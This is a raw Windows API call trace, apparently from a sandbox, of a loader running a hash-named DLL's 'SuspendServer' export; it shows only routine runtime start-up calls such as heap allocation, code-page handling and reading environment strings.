[0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x54) returned 0x539600 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x52) returned 0x539660 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24) returned 0x53b420 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x42) returned 0x540a20 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2c) returned 0x532140 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x44) returned 0x540c50 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24) returned 0x53b480 [0107.465] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545040 | out: hHeap=0x530000) returned 1 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1000) returned 0x544660 [0107.465] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0107.465] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0107.465] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=SuspendServer" [0107.465] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=SuspendServer", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x539750*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0107.466] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0107.474] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0107.474] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0107.474] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0107.474] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0107.475] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0107.475] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0107.475] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0107.476] GetProcessHeap () returned 0x530000 [0107.476] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0107.476] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0107.476] GetLastError () returned 0x0 [0107.476] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0107.476] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0107.476] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3c8) returned 0x545af0 [0107.476] SetLastError (dwErrCode=0x0) [0107.477] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1200) returned 0x545ec0 [0107.478] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0107.478] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0107.478] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0107.478] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0107.478] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=SuspendServer" [0107.478] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=SuspendServer" [0107.479] GetACP () returned 0x4e4 [0107.479] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x228) returned 0x53ac80 [0107.479] IsValidCodePage (CodePage=0x4e4) returned 1 [0107.479] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0107.479] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0107.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0107.479] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0107.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0107.479] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0107.479] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0107.479] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0107.480] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0107.480] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0107.480] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.480] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0107.480] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0107.480] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0107.480] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0107.480] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0107.480] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1000) returned 0x5470d0 [0107.480] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0107.480] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0107.481] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0107.481] AreFileApisANSI () returned 1 [0107.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0107.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xc7) returned 0x534840 [0107.481] GetEnvironmentStringsW () returned 0x5480e0* [0107.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x4e6) returned 0x548ac0 [0107.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x548ac0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0107.481] FreeEnvironmentStringsW (penv=0x5480e0) returned 1 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x118) returned 0x539c70 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1f) returned 0x53b450 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2e) returned 0x5398d0 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x31) returned 0x534f80 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3c) returned 0x540c00 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x31) returned 0x534fc0 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x14) returned 0x539c00 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24) returned 0x53b4b0 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd) returned 0x534070 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1d) returned 0x53b840 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x31) returned 0x535000 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x15) returned 0x535040 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x17) returned 0x5325e0 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe) returned 0x533ea0 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x69) returned 0x533ec0 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3e) returned 0x540480 [0107.481] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1d) returned 0x53b870 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x48) returned 0x5409d0 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x12) returned 0x533f40 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x533f60 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1b) returned 0x53b8d0 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1e) returned 0x53b630 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x29) returned 0x5485b0 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1e) returned 0x53b4e0 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6b) returned 0x53ba00 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x17) returned 0x53ba80 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xf) returned 0x53baa0 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x16) returned 0x53bac0 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2a) returned 0x548830 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x29) returned 0x548870 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x12) returned 0x5490c0 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x21) returned 0x53b510 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x16) returned 0x5491a0 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x22) returned 0x53b900 [0107.482] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x12) returned 0x5492a0 [0107.482] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x548ac0 | out: hHeap=0x530000) returned 1 [0107.483] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xa3a7) returned 0x5493c0 [0107.484] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x20) returned 0x53b750 [0107.484] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xa3a7) returned 0x553770 [0107.485] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5493c0 | out: hHeap=0x530000) returned 1 [0107.485] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xfef7) returned 0x55db20 [0107.489] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x40) returned 0x540e80 [0107.489] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xfef7) returned 0x56da20 [0107.490] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x53b750 | out: hHeap=0x530000) returned 1 